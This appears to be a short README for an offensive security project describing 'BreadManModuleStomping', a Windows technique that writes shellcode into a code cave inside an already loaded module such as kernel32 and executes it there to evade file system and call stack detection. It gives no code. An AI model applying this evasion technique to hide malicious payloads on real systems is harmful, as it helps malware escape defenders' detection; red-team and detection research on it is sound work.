This project was created to show off a technique I created called BreadManModuleStomping. It performs module stomping with a unique twist. Instead of loading a module into memory and then overwriting the contents of the .text section with a malicious payload. It does the following:
- Searches for a code cave in previously loaded module (i.e. kernel32) that has the capacity to fit our shellcode
- Changes memory permissions from execute & read to read & write
- writes payload to code cave
- Executes payload to code cave.
This has a few benefits from an offensive security perspective:
- Does not require interaction with the file system or windows loader. - Less possibilty to trigger events.
- Code execution appears to come from legitimately loaded module in the call stack. - Less possibility for call stack detection.